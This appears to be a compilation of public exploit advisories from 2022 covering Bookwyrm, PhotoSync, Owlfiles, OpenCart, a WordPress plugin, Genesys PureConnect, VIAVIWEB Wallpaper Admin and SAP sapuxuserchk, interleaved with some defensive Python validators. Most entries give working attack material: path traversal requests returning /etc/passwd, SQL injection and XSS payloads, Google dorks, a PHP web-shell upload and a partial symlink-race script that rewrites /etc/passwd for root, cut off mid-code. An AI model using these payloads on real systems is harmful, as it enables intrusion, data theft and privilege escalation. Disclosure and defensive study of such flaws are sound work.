<pre><code># Exploit Title: Bookwyrm v0.4.3 - Authentication Bypass<br /># Date: 2022-08-4<br /># Exploit Author: Akshay Ravi<br /># Vendor Homepage: https://github.com/bookwyrm-social/bookwyrm<br /># Software Link: https://github.com/bookwyrm-social/bookwyrm/releases/tag/v0.4.3<br /># Version: <= 4.0.3<br /># Tested on: macOS Monterey<br /># CVE: CVE-2022-2651<br /># Original Report Link: https://huntr.dev/bounties/428eee94-f1a0-45d0-9e25-318641115550/<br /><br />Description: Email Verification Bypass Leads To Account Takeover in bookwyrm-social/bookwyrm v0.4.3 Due To Lack Of Ratelimit Protection<br /><br /># Steps to reproduce:<br /><br />1. Create an account using the victim's email address.<br />2. When the account is created, it asks for email confirmation by validating an OTP.<br />Endpoint: https://site/confirm-email<br />3. Enter any OTP and brute-force the value; there is no rate limit, so once the OTP matches the account can be taken over.<br /><br /></code></pre>
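The missing control in the advisory above is a per-code attempt budget. The following is an added example, not Bookwyrm's code, of an email-confirmation store that issues CSPRNG codes, expires them, burns a code after MAX_ATTEMPTS wrong guesses and compares in constant time; the class, function and constant names are assumptions.

```python
import hmac
import secrets
import time

CODE_LENGTH = 6             # digits in the confirmation code
MAX_ATTEMPTS = 5            # wrong guesses allowed before the code is burned
CODE_TTL_SECONDS = 15 * 60  # a code is only valid for this long after issue


class ConfirmationStore:
    """Pending email confirmations keyed by account id (assumed in-memory stand-in for a DB table).

    `clock` is injectable so expiry can be exercised without sleeping.
    """

    def __init__(self, clock=time.time):
        self._clock = clock
        self._pending = {}  # account_id -> {"code", "issued_at", "attempts"}

    def issue(self, account_id):
        """Generate a fresh code from a CSPRNG and reset the attempt counter."""
        code = "".join(secrets.choice("0123456789") for _ in range(CODE_LENGTH))
        self._pending[account_id] = {"code": code, "issued_at": self._clock(), "attempts": 0}
        return code

    def confirm(self, account_id, submitted):
        """Returns 'confirmed', 'wrong', 'locked', 'expired' or 'no_pending'."""
        rec = self._pending.get(account_id)
        if rec is None:
            return "no_pending"
        if self._clock() - rec["issued_at"] > CODE_TTL_SECONDS:
            del self._pending[account_id]
            return "expired"
        rec["attempts"] += 1
        # Constant-time comparison: response timing must not leak how many digits matched.
        if hmac.compare_digest(rec["code"].encode(), str(submitted).encode()):
            del self._pending[account_id]
            return "confirmed"
        if rec["attempts"] >= MAX_ATTEMPTS:
            # Budget exhausted: burn the code so the remaining space cannot be walked.
            del self._pending[account_id]
            return "locked"
        return "wrong"


def brute_force_budget(store, account_id):
    """Walk the code space from 000000 upward, as an unthrottled client would, and report
    how many guesses the store evaluated and how the run ended."""
    guesses = 0
    for guess in range(10 ** CODE_LENGTH):
        guesses += 1
        outcome = store.confirm(account_id, f"{guess:0{CODE_LENGTH}d}")
        if outcome != "wrong":
            return guesses, outcome
    return guesses, "exhausted"
```

With a 6-digit code and a 5-guess budget the chance of a blind hit is 5 in a million per issued code, which is the property the unthrottled endpoint lacks.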
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/f72138e574743640bdcdb9f102dff0a5.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Dropper.Win32.Corty.10<br />Vulnerability: Insecure Credential Storage<br />Description: The malware stores its credentials in cleartext within the Windows registry.<br />Family: Corty<br />Type: PE32<br />MD5: f72138e574743640bdcdb9f102dff0a5<br />Vuln ID: MVID-2022-0639<br />Dropped files: TMP205880.EXE<br />Disclosure: 09/19/2022<br /><br />Exploit/PoC:<br />Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\UltraAccess Networks\NetBus Server\Telnet<br />Login\Admin<br />Password\1234<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: PhotoSync 4.7 iOS App - Local File Inclusion<br /># Date: Sep 19, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.photosync-app.com/home.html<br /># Software Link: https://apps.apple.com/us/app/photosync-transfer-photos/id415850124<br /># Version: 4.7<br /># Tested on: iPhone, iOS 16.0<br /><br /><br />GET /../../../../../../../../../../../../../../../etc/passwd HTTP/1.1<br />Host: 192.168.8.101:8080<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br /><br />-------<br /><br />HTTP/1.1 200 OK<br />Date: Mon, 19 Sep 2022 06:35:11 GMT<br />Accept-Ranges: bytes<br />Content-Length: 2791<br /><br />##<br /># User Database<br />#<br /># This file is the authoritative user database.<br />##<br />nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false<br />root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh<br />mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh<br />daemon:*:1:1:System Services:/var/root:/usr/bin/false<br />_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false<br />_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false<br />_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false<br />_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false<br />_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false<br />_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false<br />_securityd:*:64:64:securityd:/var/empty:/usr/bin/false<br />_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false<br />_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false<br />_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false<br />_usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false<br />_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false<br />_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false<br />_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false<br />_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false<br />_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false<br />_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false<br />_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false<br />_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false<br />_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false<br />_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false<br />_driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false<br />_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false<br />_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false<br />_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false<br />_rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false<br />_accessoryupdater:*:278:278:Accessory Update Daemon:/var/db/accessoryupdater:/usr/bin/false<br />_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false<br />_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false<br />_sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false<br />_trustd:*:282:282:trustd:/var/empty:/usr/bin/false<br />_mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false<br />_darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false<br />_notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false<br />_backboardd:*:287:287:BackBoard:/var/empty:/usr/bin/false<br />_avphidbridge:*:288:288:Apple Virtual Platform HID Bridge:/var/empty:/usr/bin/false<br />_launchservices:*:290:290:Launch Services:/var/empty:/usr/bin/false<br /></code></pre>
<pre><code># Exploit Title: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities<br /># Date: Sep 19, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.skyjos.com/<br /># Software Link: https://apps.apple.com/us/app/owlfiles-file-manager/id510282524<br /># Version: 12.0.1<br /># Tested on: iOS 16.0<br /><br /><br />###########<br />Path traversal on HTTP built-in server<br />###########<br /><br />GET /../../../../../../../../../../../../../../../System/ HTTP/1.1<br />Host: 192.168.8.101:8080<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />If-None-Match: 42638202/1663558201/177889085<br />If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT<br />Connection: close<br />Content-Length: 0<br /><br />-------<br />HTTP/1.1 200 OK<br />Cache-Control: max-age=3600, public<br />Content-Length: 317<br />Content-Type: text/html; charset=utf-8<br />Connection: Close<br />Server: GCDWebUploader<br />Date: Mon, 19 Sep 2022 05:01:11 GMT<br /><br /><!DOCTYPE html><br /><html><head><meta charset="utf-8"></head><body><br /><ul><br /><li><a href="Cryptexes/">Cryptexes/</a></li><br /><li><a href="DriverKit/">DriverKit/</a></li><br /><li><a href="Library/">Library/</a></li><br /><li><a href="Applications/">Applications/</a></li><br /><li><a href="Developer/">Developer/</a></li><br /></ul><br /></body></html><br /><br /><br />#############<br />LFI on HTTP built-in server<br />#############<br /><br />GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1<br />Host: 192.168.8.101:8080<br />Accept: application/json, text/javascript, */*; q=0.01<br />User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25<br />X-Requested-With: XMLHttpRequest<br />Referer: http://192.168.8.101:8080/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br /><br />----<br /><br />HTTP/1.1 200 OK<br />Connection: Close<br />Server: GCDWebUploader<br />Content-Type: application/octet-stream<br />Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT<br />Date: Mon, 19 Sep 2022 03:28:14 GMT<br />Content-Length: 213<br />Cache-Control: max-age=3600, public<br />Etag: 1152921500312187994/1662169021/0<br /><br />##<br /># Host Database<br />#<br /># localhost is used to configure the loopback interface<br /># when the system is booting. Do not change this entry.<br />##<br />127.0.0.1 localhost<br />255.255.255.255 broadcasthost<br />::1 localhost<br /><br /><br /><br />###############<br />Path traversal on FTP built-in server<br />###############<br /><br />ftp> cd ../../../../../../../../../<br />250 OK. Current directory is /../../../../../../../../../<br />ftp> ls<br />200 PORT command successful.<br />150 Accepted data connection<br />total 10<br />drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr<br />drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin<br />drwxr-xr-x 0 root wheel 608 Jan 01 1970 sbin<br />drwxr-xr-x 0 root wheel 224 Jan 01 1970 System<br />drwxr-xr-x 0 root wheel 640 Jan 01 1970 Library<br />drwxr-xr-x 0 root wheel 224 Jan 01 1970 private<br />drwxr-xr-x 0 root wheel 1131 Jan 01 1970 dev<br />drwxr-xr-x 0 root admin 4512 Jan 01 1970 Applications<br />drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer<br />drwxr-xr-x 0 root admin 64 Jan 01 1970 cores<br />WARNING! 10 bare linefeeds received in ASCII mode<br />File may not have transferred correctly.<br />226 Transfer complete.<br />ftp><br /><br />#############<br />XSS on HTTP built-in server<br />#############<br /><br />PoC 1:<br /><br />http://192.168.8.101:8080/download?path=<script>alert(rose)</script><br /><br />PoC 2:<br /><br />http://192.168.8.101:8080/list?path=<script>alert(rose)</script><br /></code></pre>
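Both iOS app servers above (PhotoSync and Owlfiles) map the request path straight onto the device filesystem. The following added example, which is not code from either app or from GCDWebUploader, shows the check such a file-serving endpoint needs: percent-decode, reject any ".." segment outright, and confirm the realpath stays under the served root so an in-tree symlink cannot escape either; the function names and the constructed served tree are assumptions.

```python
import os
import tempfile
from urllib.parse import unquote


class PathTraversalError(ValueError):
    """Raised when a request path would leave the served directory."""


def resolve_request_path(root, request_path):
    """Map an HTTP or FTP request path onto a file under `root`.

    Rejects, rather than silently normalises, anything that escapes:
    - percent-decoded first, so '%2e%2e' is treated like '..'
    - NUL bytes rejected (they truncate paths in C-based servers)
    - any '..' segment rejected outright, even one that would stay in-tree
    - the realpath of the result must stay under the realpath of root, so a
      symlink planted inside the served tree cannot point outside it either
    """
    decoded = unquote(request_path)
    if "\x00" in decoded:
        raise PathTraversalError("NUL byte in request path")
    # Treat backslashes as separators too; some servers accept both.
    segments = [s for s in decoded.replace("\\", "/").split("/") if s not in ("", ".")]
    if ".." in segments:
        raise PathTraversalError(f"dot-dot segment in {request_path!r}")
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, *segments))
    if candidate != real_root and not candidate.startswith(real_root + os.sep):
        raise PathTraversalError(f"{request_path!r} resolves outside the served directory")
    return candidate


def classify(root, request_path):
    """'ok' or the rejection reason; the string is what a server would log."""
    try:
        resolve_request_path(root, request_path)
        return "ok"
    except PathTraversalError as e:
        return str(e)


def demo():
    """Constructed served tree: one legitimate file and one symlink pointing out of the tree.
    Returns the verdict for each request path, including the ones from the advisories above."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.html"), "w") as f:
            f.write("<html></html>")
        os.mkdir(os.path.join(root, "Photos"))
        os.symlink(os.path.dirname(root), os.path.join(root, "escape"))  # link to the parent dir
        requests = [
            "/index.html",                                                # legitimate
            "/../../../../../../../../../../../../../../../etc/passwd",   # PhotoSync request
            "/../../../../../../../../../../../../../../../System/",      # Owlfiles request
            "/..%2f..%2f..%2fetc/hosts",                                  # same idea, encoded
            "../../../../../../../../../",                                # the FTP 'cd' above
            "/escape/anything",                                           # symlink out of the tree
            "/Photos/../index.html",                                      # in-tree '..', still refused
        ]
        return {path: classify(root, path) for path in requests}
```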
<pre><code># Exploit Title: OpenCart v3.x So Newsletter Custom Popup Module - Blind SQL Injection<br /># Date: 18/09/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.opencart.com/<br /># Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=40259&filter_search=newsletter&filter_license=1&sort=date_added<br /># Version: v.4.0<br /># Tested on: XAMPP, Linux<br /># Contact: https://twitter.com/dmaral3noz<br /><br /><br />* Description :<br /><br />The So Newsletter Custom Popup module (compatible with any OpenCart install) allows SQL injection via the 'email' parameter of index.php?route=extension/module/so_newletter_custom_popup/newsletter.<br />Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.<br /><br /><br />* Steps to Reproduce :<br />- Go to : http://127.0.0.1/index.php?route=extension/module/so_newletter_custom_popup/newsletter<br />- Save the request in Burp Suite<br />- Run the saved request with : sqlmap -r sql.txt -p email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs<br /><br /><br /><br />Request :<br /><br />===========<br /><br />POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1<br />Content-Type: application/x-www-form-urlencoded<br />Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Encoding: gzip,deflate<br />Content-Length: 29<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0<br />Connection: Keep-alive<br /><br />createdate=2022-8-28%2019:4:6&email=hi&status=0<br /><br /><br />===========<br /><br />Output :<br /><br />Parameter: #1* ((custom) POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: createdate=2022-8-28 19:4:6&email=hi' AND 4805=4805-- nSeP&status=0<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: createdate=2022-8-28 19:4:6&email=hi' AND (SELECT 4828 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(4828=4828,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sRQS&status=0<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin ‘GetYourGuide Ticketing’ - Stored Cross-Site Scripting<br /># Date: 18-09-2022<br /># Exploit Author: Mariam Tariq - HunterSherlock<br /># Vendor Homepage: https://wordpress.org/plugins/search/GetYourGuide+Ticketing/<br /># Version: 1.0.1<br /># Tested on: Firefox<br /># Contact me: mariamtariq404@gmail.com<br /><br /># Vulnerable code:<br /><br /><input type="text" name="partner_hash" value="<?php echo $partner_hash ?>"></input><br /><br /># POC:<br /><br />1- Install the plugin ‘GetYourGuide Ticketing’ and activate it.<br />2- Navigate to GYG-Ticketing.<br />3- Enter the XSS payload `"><img src=x onerror=alert(1)>`<br />4- Go to the link builder to verify the XSS pop-up.<br /><br /># POC image:<br /><br />https://imgur.com/amrDhIt<br /></code></pre>
<pre><code>Product: Genesys PureConnect - Interaction Web Tools Chat Service<br />Description: Interaction Web Tools Chat Service allows XSS within the Printable Chat History via the participant -> name JSON POST parameter.<br />Vulnerability Type: XSS<br />Vendor of Product: Genesys PureConnect<br />Affected Product Code Base: Interaction Web Tools - Chat Service - Appears to be all versions up to current release<br />Affected Component: "Print" feature of the Interaction Web Tools Chat: https://help.genesys.com/pureconnect/mergedprojects/wh_tr/desktop/pdfs/web_tools_dg.pdf<br />Attack Vectors:<br /><br /> * To exploit the Cross-Site Scripting vulnerability, visit https://<vulnerable-domain>/I3Root/chatOrCallback.html<br /> * Then select the 'I don't have an account' option, and enter the name "><script>alert(1)</script><br /> * Then press 'Start Chat'<br /> * Then enter anything in the chat box like 'asdfg' and press send<br /> * Now select the 'Printable Chat History' in the top right corner<br /> * XSS will trigger. You can google dork for vulnerable versions with inurl:"/I3Root/chatOrCallback.html"<br /><br /><br />I'm assuming if an admin tries to print the chat conversation, it will trigger for them as well. Unable to confirm though.<br /><br />Discoverer: Jake Murphy - Echelon Risk + Cyber - https://echeloncyber.com/<br /><br />[References]<br />http://genesys.com<br />http://interaction.com<br /><br /></code></pre>
<pre><code># Exploit Title: VIAVIWEB Wallpaper Admin - Multiple Vulnerabilities<br /># Google Dork: intext:"Wallpaper Admin" "LOGIN" "password" "Username"<br /># Date: 18/09/2022<br /># Exploit Author: Edd13Mora<br /># Vendor Homepage: www.viaviweb.com<br /># Version: N/A<br /># Tested on: Windows 11 - Kali Linux<br /><br />------------------<br />SQLi on the login page<br />------------------<br />Payload --> admin' or 1=1-- -<br />---<br />PoC:<br />---<br />[1] Disable JavaScript in your browser, enter the payload and submit.<br />[2] Re-enable JavaScript and resend the request.<br />---------------------------<br />Authenticated SQL Injection:<br />---------------------------<br />Vulnerable endpoint --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]<br />-----------------------------------------------<br />Unauthenticated Remote Code Execution (RCE):<br />-----------------------------------------------<br />PoC:<br />----<br />Vulnerable endpoint --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes<br />--------------------<br />Burp Request:<br />--------------------<br /><br />POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2<br />Host: http://googlezik.freehostia.com<br />Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848<br />Content-Length: 467<br />Origin: http://googlezik.freehostia.com<br />Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br /><br />-----------------------------33893919268150571572221367848<br />Content-Disposition: form-data; name="category_id"<br /><br />1<br />-----------------------------33893919268150571572221367848<br />Content-Disposition: form-data; name="image[]"; filename="poc.php"<br />Content-Type: image/png<br /><br /><?php phpinfo(); ?><br />-----------------------------33893919268150571572221367848<br />Content-Disposition: form-data; name="submit"<br /><br /><br />-----------------------------33893919268150571572221367848--<br /><br /><br />Uploaded file can be found here:<br />--------------------------------<br />http://localhost/PAth-Where-Script-Installed/categories/<br /></code></pre>
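The upload above gets through because the server trusts the client-supplied Content-Type and filename. The following added example, not the Wallpaper Admin script's code, parses a constructed replica of that multipart body and validates each file field by extension allowlist plus file signature, storing it under a server-chosen name; the function names and the SIGNATURES table are assumptions.

```python
import secrets
from email import policy
from email.parser import BytesParser

# Boundary from the request above (the body delimiters are "--" + BOUNDARY).
BOUNDARY = "---------------------------33893919268150571572221367848"

# Allowed extensions and the file signature(s) the bytes must start with.
SIGNATURES = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}


def form_part(name, value, filename=None, content_type=None):
    """Build one multipart/form-data part (helper for the constructed sample bodies)."""
    head = f'Content-Disposition: form-data; name="{name}"'
    if filename is not None:
        head += f'; filename="{filename}"'
    if content_type is not None:
        head += f"\r\nContent-Type: {content_type}"
    return b"--" + BOUNDARY.encode() + b"\r\n" + head.encode() + b"\r\n\r\n" + value + b"\r\n"


def build_body(parts):
    return b"".join(parts) + b"--" + BOUNDARY.encode() + b"--\r\n"


# Constructed replica of the request body above: PHP source labelled image/png.
MALICIOUS_BODY = build_body([
    form_part("category_id", b"1"),
    form_part("image[]", b"<?php phpinfo(); ?>", filename="poc.php", content_type="image/png"),
    form_part("submit", b""),
])

# Constructed benign upload whose bytes really carry the PNG signature.
BENIGN_BODY = build_body([
    form_part("category_id", b"1"),
    form_part("image[]", b"\x89PNG\r\n\x1a\n" + bytes(16), filename="wallpaper.png", content_type="image/png"),
    form_part("submit", b""),
])


def validate_upload(filename, data):
    """Accept or reject on server-side evidence only; the client's Content-Type is never consulted.
    Returns (accepted, reason, server_chosen_name)."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]  # drop any directory the client sent
    if "." not in base:
        return False, "no extension", None
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in SIGNATURES:
        return False, f"extension .{ext} not allowed", None
    if not any(data.startswith(sig) for sig in SIGNATURES[ext]):
        return False, f"content is not a .{ext} file", None
    # Random server-generated name: the client controls neither the path nor the extension.
    return True, "ok", f"{secrets.token_hex(16)}.{ext}"


def check_multipart(body, boundary=BOUNDARY):
    """Parse a multipart/form-data body and return one verdict per file field."""
    header = f"Content-Type: multipart/form-data; boundary={boundary}\r\n\r\n".encode()
    msg = BytesParser(policy=policy.default).parsebytes(header + body)
    verdicts = []
    for part in msg.iter_parts():
        filename = part.get_filename()
        if filename is None:
            continue  # plain form field such as category_id
        accepted, reason, stored = validate_upload(filename, part.get_payload(decode=True))
        verdicts.append({
            "field": part.get_param("name", header="content-disposition"),
            "filename": filename,
            "declared_type": part.get_content_type(),  # client-supplied, recorded for the log only
            "accepted": accepted,
            "reason": reason,
            "stored_as": stored,
        })
    return verdicts
```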
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220915-0 ><br />=======================================================================<br /> title: Local privilege escalation<br /> product: SAP® SAPControl Web Service Interface (sapuxuserchk)<br /> vulnerable version: see section "Vulnerable / tested versions"<br /> fixed version: see SAP security note 3158619<br /> CVE number: CVE-2022-29614<br /> impact: medium<br /> homepage: https://www.sap.com/about.html<br /> found: 2022-02-24<br /> by: M. Li (Office Munich)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"The SAP Start Service (sapstartsrv) provides basic management services for<br />systems and instances and single server processes. Services include starting<br />and stopping, monitoring the current run-time state, reading logs, traces and<br />configuration files, executing commands and retrieving other<br />technology-specific information, like network access points, active sessions,<br />thread list etc. They are exposed by a SOAP Web service interface named<br />"SAPControl". This paper describes how to use this Web service interface."<br /><br />Source: https://assets.cdn.sap.com/sapcom/docs/2016/09/0a40e60d-8b7c-0010-82c7-eda71af511fa.pdf<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends implementing security note 3158619, where the<br />documented issue is fixed according to the vendor.
We advise installing the<br />corrections as a matter of priority to keep business-critical data secured.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Local privilege escalation (CVE-2022-29614)<br />The SUID-root program sapuxuserchk erroneously follows a symbolic link when<br />creating a temporary local logon ticket and changing the ownership of the<br />target file for owner access only. As a member of the group sapsys, a user can<br />therefore escalate his/her privileges to root on a local Unix system by<br />successfully exploiting a race condition.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Local privilege escalation (CVE-2022-29614)<br />The utility sapuxuserchk is used by sapcontrol to request a temporary local<br />logon ticket in the following way; the ticket is then created in the folder<br />/usr/sap/SEC/D00/work/sapcontrol_logon/<br /><br />$ sapcontrol -nr 0 -function RequestLogonFile user0<br /><br />$ ls -l logon*<br />-rw------- 1 secadm sapsys 40 Feb 25 08:58 logon0<br />-rw------- 1 user0 users 40 Feb 25 09:00 logon1<br />-rw------- 1 root root 40 Feb 25 09:01 logon2<br /><br /><br />Since sapcontrol is supposed to create the ticket for any system user, it<br />requires a utility with the SUID bit set.
The owner, group and permission bits of sapuxuserchk in a standard<br />installation are shown below.<br /><br />$ ls -l sapuxuserchk<br />-rwsr-x--- 1 root sapsys 1312137 Feb 28 2019 sapuxuserchk<br /><br />The request originating from sapcontrol is first sent to the instance server<br />sapstartsrv, which pipes into sapuxuserchk a 512-byte encrypted message<br />containing the ticket path, user name and ticket in plaintext, as in the<br />example shown below.<br /><br />$ strings input-0-plaintext<br />SAPLOGONFILE /usr/sap/SEC/D00/work/sapcontrol_logon/logon1<br /> user0<br />1133146902252676394602837452470900726967<br /><br /><br />Before creating the ticket, sapuxuserchk performs a sanity check in the<br />function internal_create_saplogon_file to ensure that the file does not<br />exist yet.<br /><br />However, this check introduces a race condition between the stat and open<br />calls, as shown by the following excerpt from strace.<br /><br />stat("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", 0x7ffc0d2e1530) = -1 ENOENT (No such file or directory)<br />open("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", O_RDWR|O_CREAT|O_TRUNC, 0600) = 3<br />fchown(3, 1000, 100)<br /><br /><br />The attacker can run a race of constantly re-creating a symbolic link logon1<br />pointing to a privileged file such as /etc/passwd while repeatedly invoking<br />the SUID-root program sapuxuserchk, in the hope that the creation of the link<br />takes place between the stat and open calls, so that the first fails (meaning<br />that the file does not exist yet) while the second, as well as the ensuing<br />fchown call, succeeds. If the race is won, the attacker gains read-write<br />permission on the target file.<br /><br />The following run won the race after 629 attempts and gained root<br />privileges.
The PoC further below lists the exploit implementing the idea<br />above with a pre-intercepted message for user secadm.<br /><br />-------------------------------------------------------------------------<br />sh-4.3$ id<br />uid=1001(secadm) gid=474(sapsys) groups=474(sapsys),1000(sapinst)<br /><br />sh-4.3$ ls -l /etc/passwd<br />-rw-r--r-- 1 root root 2517 Feb 25 00:47 /etc/passwd<br /><br />sh-4.3$ python3 sapmatt.py<br />this many tries: 629<br />[+] now login as sapmatt<br /><br />sh-4.3$ su sapmatt<br />Password:<br /><br />sh-4.3# id<br />uid=0(sapmatt) gid=0(root) groups=0(root)<br /><br />sh-4.3# ls -l /etc/passwd<br />-rw-r--r-- 1 secadm sapsys 73 Feb 25 10:03 /etc/passwd<br /><br /><br />$ cat sapmatt.py<br />import sys, os, signal, base64, random, string<br /><br />secadm_msg = b'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'<br /># openssl passwd sappass<br />u1_passwd = "sapmatt:wPi023oIkjHdA:0:0::/root:/bin/sh\nsecadm:x:1001:474::/tmp:/bin/sh\n"<br />logon_symlink = "/usr/sap/SEC/D00/work/sapcontrol_logon/logon1"<br />target_file = "/etc/passwd"<br /><br />g = 1024<br />if not os.path.isfile(logon_symlink):<br />    os.system("touch " + logon_symlink)<br />secadm_msg = base64.b64decode(secadm_msg)<br /><br />msg_file = '/tmp/msg' + ''.join(random.choice(string.ascii_letters) for i in range(8))<br />f0 = open(msg_file, "wb")<br />f0.write(secadm_msg)<br 